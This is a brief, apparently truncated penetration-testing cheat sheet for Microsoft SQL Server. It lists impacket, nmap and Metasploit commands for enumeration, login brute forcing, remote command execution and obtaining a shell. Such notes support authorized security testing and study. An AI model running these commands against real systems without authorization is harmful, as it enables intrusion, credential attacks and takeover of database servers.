-
Accessing in Linux: impacket-mssqlclient Administrator:password@$target -windows-auth Default databases are: Enumeration Determine version nmap -p 445 --script ms-sql-info $target Via metasploit auxiliary/scanner/mssql/mssql_ping Via Impacket mssqlinstance.py $target Login brute force scanner/mssql/mssql_login When an account is known, enumerate for vulnerabilities auxiliary/admin/mssql/mssql_enum Exploitation Execute commands auxiliary/admin/mssql/mssql_exec Get shell windows/mssql/mssql_payload Tools Command line sqsh -U sa -P $password -S $target:1433 From PowerShell sqlcmd -S…